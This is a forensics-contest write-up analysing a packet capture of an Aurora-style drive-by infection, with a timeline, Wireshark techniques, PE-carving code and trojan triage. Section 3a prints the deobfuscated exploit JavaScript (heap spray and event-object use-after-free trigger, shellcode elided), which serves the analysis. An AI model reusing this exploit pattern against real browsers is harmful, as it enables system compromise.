Name: Candice Quates 

Description: 

The analysis so far, Puzzle #6, Ann DerCover and Vick Timmes.

Contents:

0.  Introduction and tools
1.  Packet capture major event timeline
2.  Questions answered by looking at pcap in Wireshark
3.  Questions answered by extracting files 
  3a. The file of javascript
  3b. Getting the executable / writing a carver
4.  So, what really happened? Where is the C&C?

0.  Introduction and tools

So we have an Aurora puzzle here.  There is a bit of mystery
as to how these attacks actually work; is Ann waiting on the other end
controlling Vick's every move, or is it all programmed into the exploit
and trojan horse programs?  Amidst this we have been asked to come up
with answers to several packet-based questions, and some file-based
ones.  How far down the rabbit hole of javascript and exploit analysis
should we go?

Tools. Tools are fun.  
I used primarily wireshark on ubuntu for the plain packet analysis, and 
NetworkMiner in a Windows XP vmware instance to extract the initial HTTP
infection, as well as for a nice overview of sessions.  I used my own 
hastily written carver to extract the exe files from the "follow tcp stream, 
save as" dumps in wireshark, and checked my results of that against foremost. 
The free linux hex editor 'hte' (hte.sourceforge.net) can parse the PE
header data and disassemble without needing to boot into a vm to use a 
nice windows hex editor.  It's a little shaky for actual editing, though.

As I mentioned rabbit holes, until this puzzle I had only passing knowledge
of the javascript exploit vector, and I spent quite a bit of time reading
up on it.  Something also possessed me to write a carver in the middle of
the night, but I have wanted to make one of those to use as a basis for
other code for some time.  

1. Packet capture major event timeline 

Packet#|Time(s)|Event description
-------------------------------------------------------------
1	0.0	Vick clicks link http://10.10.10.10:8080/index.php
9	0.46	.gif file in iframe of index.php is requested
13	1.3	TCP session from vick to port 4444 begins
17	1.52	Packet containing start of EXE file on port 4444 arrives
1153	35.95	Connection attempts to port 4445 begin (and fail)
1562	87.6	Connection on port 4444 starts to close
1565	87.6	Port 4444 finishes closing
1652	122.7	Start of successful port 4445 connection
1656	123.6	Successful connection handshake done on port 4445
1660	123.9	EXE file download from port 4445 begins
2552	198.4	Connection on port 4445 starts to close
2554	198.4	Port 4445 finishes closing. Capture ends

(This table uses tabs.  Hopefully it will survive cut and paste.) 

2.  Questions answered by looking at pcap in Wireshark

All of the above table data was found using wireshark.  I also plugged 
this pcap file into NetworkMiner, and found that NetworkMiner seemed to
ignore all the failed connection attempts.  Maybe I missed something,
but that struck me as odd.  The table above I pieced together from my
notes answering all of the different questions, as I had the packet
numbers and times all scribbled down on paper.  I took notes and kept
them ordered by date, and cleaned them up later, adding some missing
times and double-checking their locations.

One packet-related question that was a little tedious was question #7.
I had to go figure out where in the wireshark settings you turn off
relative sequence numbers (preferences->protocols->tcp) so that the real
values show.  The sequence numbers changed every third packet of the
failed connection attempts, except for the first attempt, where they
changed on the fourth packet.

I found out how to add a custom column showing the ip.id field to the
packet list, using the wonder of google and mailing lists.
For that, go into preferences, make a new column with the custom
type, and put 'ip.id' into its field name.  That made the id numbers
come up very clearly, changing once per packet.
  
For the port number changes part of problem #7, I made a table on paper
in notes which I'll reproduce here: 

Packet	Time	Source port attempting to connect to port 4445
-------------------------------------------------------------
1153	35.94	1037
1187	47.73	1038
1313	59.46	1039
1503	71.25	1040
1533	82.99	1041
1568	94.87	1042
1598	106.83	1043
1628	118.74	1044 <- success on this one, eventually

From this capture, the source port changes roughly every twelve seconds.
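
As a quick check on the "roughly every twelve seconds" figure, here is a
small sketch that recomputes the gaps from the table above.  The rows are
copied from that table; the names `attempts` and `intervals` are made up
for this example.

```python
# (packet number, time in seconds, source port), copied from the table above
attempts = [
    (1153, 35.94, 1037),
    (1187, 47.73, 1038),
    (1313, 59.46, 1039),
    (1503, 71.25, 1040),
    (1533, 82.99, 1041),
    (1568, 94.87, 1042),
    (1598, 106.83, 1043),
    (1628, 118.74, 1044),
]


def intervals(rows):
    """Return the gaps in seconds between consecutive attempt start times."""
    times = [t for _, t, _ in rows]
    return [round(later - earlier, 2) for earlier, later in zip(times, times[1:])]


gaps = intervals(attempts)
mean_gap = sum(gaps) / len(gaps)
ports = [port for _, _, port in attempts]

print("gaps between attempts:", gaps)
print("mean gap: %.2f s" % mean_gap)
# True when each new attempt uses the next source port up
print("ports increase by one:", all(b - a == 1 for a, b in zip(ports, ports[1:])))
```

The gaps all come out a little under twelve seconds, and the source port
goes up by one with each new attempt.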

3.  Questions answered by extracting files 

3a. The file of javascript

The first two files were nice and encapsulated in HTTP requests, and 
NetworkMiner came up with them easily.  'index.php' is full of obfuscated 
javascript.  It is pretty simple to use search and replace in a programming 
editor (I just used vi) to rename the long ugly variables into generic short 
things.  That made the entire process of tracing easier to work with.  
Variables named 1,2,3,4 are easier than gibberish.
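
The same renaming could be scripted instead of done by hand in vi.  This is
only a sketch: the function name `rename_identifiers` and the obfuscated
names in the sample are hypothetical, invented for illustration, and are not
the identifiers from index.php.

```python
import re


def rename_identifiers(source, mapping):
    """Replace each whole-word identifier in `mapping` with its short name."""
    if not mapping:
        return source
    # Longest names first, so one name that is a prefix of another cannot win.
    names = sorted(mapping, key=len, reverse=True)
    pattern = re.compile(r"\b(" + "|".join(re.escape(n) for n in names) + r")\b")
    return pattern.sub(lambda m: mapping[m.group(1)], source)


# Hypothetical obfuscated names, made up for this example only.
sample = "var qXzLongNameA = new Array(); qXzLongNameA[0] = qXzLongNameAB;"
mapping = {"qXzLongNameA": "var2", "qXzLongNameAB": "var3"}

renamed = rename_identifiers(sample, mapping)
print(renamed)
```

One caveat with this approach: it is a plain text substitution, so it would
also rename a matching word inside a string literal.  For a script this
small that is easy to check by eye.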

(headers removed)
var var1 = "COMMENT";
var var2 = new Array();
for (i = 0; i < 1300; i++)
{
  var2[i] = document.createElement(var1);
  var2[i].data = "vEI";   // answer #2
}
var var3 = null;
var var4 = new Array();
var unescapefunc = unescape;
function func1()
{
  var var5 = unescapefunc( '%u.......huge block of shellcode
  var var6 = unescapefunc( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
  do { var6 += var6 } while( var6.length < 0xd0000 );
  for (PEf = 0; PEf < 150; PEf++) var4[PEf] = var6 + var5;
}
function func2(func2arg)
{
  func1();
  var3 = document.createEventObject(func2arg);
  document.getElementById("element").innerHTML = "";
  window.setInterval(func3, 50);
}
function func3()
{
  p = "\u0c0f\u0c0d...shellcode-looking stuff
  for (i = 0; i < var2.length; i++)
  {
    var2[i].data = p;
  }
  var t = var3.srcElement;
}
X/scriptX
X/headX
XbodyX
Xspan id="element"XXiframe src="/index.phpmfKSxSANkeTeNrah.gif" onload="func2(event)" /XX/spanXX/bodyXX/htmlX

At the end here, you can clearly see the URL of the gif file, whose onload
handler launches our function and runs the exploit.  I'm not entirely clear
how the giant block of shellcode does its magic, but I did extract it with
spidermonkey and look at it.  Deep analysis of javascript-based shellcode is
not something I've done before, and after starting on it I realized I might
not finish the puzzle if I kept it up.  It got me started learning about how
browser-based attacks work, and I'll take a closer look at it later.
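
For anyone without spidermonkey handy, here is a rough sketch of what
unescape() does to a '%uXXXX' string, turned into the bytes the string
occupies in memory.  It assumes the usual layout of javascript strings
(16-bit units, stored little-endian on x86); the function name
`unescape_to_bytes` is made up for this example, and it is not the
spidermonkey method used above.

```python
import re
import struct

# %uXXXX is one 16-bit unit; %XX is a unit whose high byte is zero.
TOKEN = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def unescape_to_bytes(text):
    """Convert an unescape()-style string into little-endian 16-bit units."""
    units = []
    pos = 0
    while pos < len(text):
        match = TOKEN.match(text, pos)
        if match:
            units.append(int(match.group(1) or match.group(2), 16))
            pos = match.end()
        else:
            # Plain character: assumed to fit in a single 16-bit unit.
            units.append(ord(text[pos]))
            pos += 1
    return struct.pack("<%dH" % len(units), *units)


# The var6 string from the listing, with its concatenated pieces joined.
sled = unescape_to_bytes("%u0c0d%u0c0d")
print(sled.hex())
```

The byte order is swapped within each pair, which is worth remembering
when looking for the decoded shellcode bytes in a hex editor.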

From what I can understand, the iframe loads the gif file, which by the
onload call runs func2().  That runs func1() with its giant shellcode
block, sets some stuff, and then sets up a 50 ms loop with window.setInterval
to run func3() over and over again.

I think that func1() contains the exploit (and maybe the port 4444 connection),
and the loop running func3() may be the other connect-back attempts.  The 
packet capture doesn't really help me figure this out.
  
As for the md5 of the .gif file: df3e567d6f16d040326c7a0ea29a4f41  
index.phpmfKSxSANkeTeNrah.gif

3b. Getting the executable / writing a carver

So, I found the two port 4444 and 4445 tcp executable streams pretty easily,
and separated them out into server->client only in wireshark "follow tcp 
stream" and saved each.  They both contain a bunch of junk before the MZ,
and it's not immediately apparent how big the executables within are.

-rw-r--r-- 1 833133 2010-06-23 19:53 puzzle6-packet1656stream.raw
-rw-r--r-- 1 1239098 2010-06-23 19:52 puzzle6-packet17stream.raw

I opened one up in a hex editor (hte again) and deleted off the first few
characters, closed it, and got into the PE header information, trying to
figure out how to calculate the file size.  I puzzled at it for a while,
considering there is no raw file size field in the PE spec, and realized
that the last section information is the key: the last entry of the
section header table holds the file offset of the last section
(PointerToRawData) and its size (SizeOfRawData).  Adding these two
together produces the file size, as long as nothing is appended after
that section.

I went and pulled up the finished executable from forensics puzzle #5,
fired up the editor, and a hex calculator, dug down to the two values
and there it was, the size.

Now, how to do that with a program?  In my case, C and fseek.  (Yes,
I could have just used foremost, I know.  But this only took a little
over two hours late one evening, and it was fun.)  The program searches
for MZ, then PE, and then consumes bytes to get their values, adding offsets
to get to the next piece of information.  I wrote it step by step, testing
the output against a PE file that did not need to be carved so as to have
a clear place to start.  (Again, the puzzle #5 executable.)
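
A minimal sketch of the carving approach described above, in Python rather
than the original C (which is not reproduced here).  The function names
`pe_size_at` and `carve_first_pe` are made up for this example.  One
deliberate difference: it takes the largest PointerToRawData + SizeOfRawData
over all section headers rather than trusting the last entry, which gives
the same answer whenever the sections are laid out in file order.  Data
appended after the final section would not be counted.

```python
import struct


def pe_size_at(data, mz):
    """Return the on-disk size of the PE image starting at `mz`, or None."""
    if data[mz:mz + 2] != b"MZ" or mz + 0x40 > len(data):
        return None
    # e_lfanew: offset of the "PE\0\0" signature, stored at 0x3C in the DOS header
    (e_lfanew,) = struct.unpack_from("<I", data, mz + 0x3C)
    pe = mz + e_lfanew
    if data[pe:pe + 4] != b"PE\0\0" or pe + 24 > len(data):
        return None
    (num_sections,) = struct.unpack_from("<H", data, pe + 6)
    (opt_size,) = struct.unpack_from("<H", data, pe + 20)
    # Section table follows the signature (4), COFF header (20), optional header
    table = pe + 24 + opt_size
    if num_sections == 0 or table + 40 * num_sections > len(data):
        return None
    end = 0
    for i in range(num_sections):
        # SizeOfRawData at +16 and PointerToRawData at +20 in each 40-byte entry
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def carve_first_pe(data):
    """Scan for 'MZ' and return (offset, image bytes) for the first valid PE."""
    pos = data.find(b"MZ")
    while pos != -1:
        size = pe_size_at(data, pos)
        if size and pos + size <= len(data):
            return pos, data[pos:pos + size]
        pos = data.find(b"MZ", pos + 1)
    return None
```

To use it, read one of the saved streams into memory, for example
carve_first_pe(open("puzzle6-packet17stream.raw", "rb").read()), and write
the returned bytes out to a new file.  A stray "MZ" in the junk before the
real header is skipped because the PE signature check fails there.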

Then I tried running it on both streams.  I got the same file for
both, plugged the md5 into virustotal and came up with nothing; then I
looked at my extracted files a little more carefully and realized they
were one byte too big.  After I fixed the program to carve off on an even
number of bytes (PE files always end on padded boundaries, I'm not sure
it's possible to have one with an odd size), it found something that
looked like malware!

-rw------- 1 748032 2010-06-26 22:43 pefileL995r

b062cb8344cd3e296d8868fbef289c7c  pefileL995r

http://www.virustotal.com/analisis/14f489f20d7858d2e88fdfffb594a9e5f77f1333c7c479f6d3f1b48096d382fe-1276598794

Somewhere in this process I also decided to run foremost on the
packet captures, and it came up with the same md5 as I have here.

At this point, having checked out the file well enough without really going
into the nuts and bolts, I went on to try to finish up the puzzle and see
why all of these different things happened, because there is a lot of
unexplained extra traffic after these files are downloaded on the port 4444
and 4445 connections.

If there is any time left before contest end I will sandbox this and get
back to you guys.  

4.  So, what really happened? Where is the C&C?

To be honest?  I'm not entirely sure.  The traffic on the port 4444 
connection after the PE file ends looks like gobbledygook.  I did 
some unix tricks to split the end off (split -b) and did a find in 
wireshark to find the packet where it ends, which is about at packet 
607, which is well before the port 4445 connection attempts start. 

There are a lot of imports and exports in the file we downloaded,
which doesn't seem right for normal malware, but a lot of them are
"connection" functions, probably for connecting into a botnet or
something of that nature.  I assume Ann was planning more after
she got the trojan to run on this machine.

Perhaps a quick behavioral analysis will get us some more leads?  
No, not really, at least in my sandbox setup.  I fed the binary to
it, and it just checked a bunch of stuff in the registry and exited.

I noticed though, that the binary doesn't really look packed at all,
so I put it into IDA Pro (free) and started digging.  It's got some simple
anti-debugger tricks at the dll entry point (SEH and a system call
to "IsDebuggerPresent") and actually has imports and exports present,
which is pretty weird, I thought.  It looks like OpenSSL (0.9.8k)
and Zlib are statically linked, because the strings for their code
are all in the resources section.  I started chasing malware-ish
looking functions in the exports section back up through the code,
and found possible evidence of a keylogger (ReadConsoleInputA) and
of process memory modification (WriteProcessMemory), which suggests it
hooks other code to hide itself.  Looks like a trojan to me, but I have
not found the source of the communications code; I found lots of
create packet/receive packet/send packet sort of functions, but not
anything to help me answer the question: why did the port 4445
download start?

From here I am out of time, and I hope you like my analysis,
incomplete as it may be.


Candice Quates, June 2010.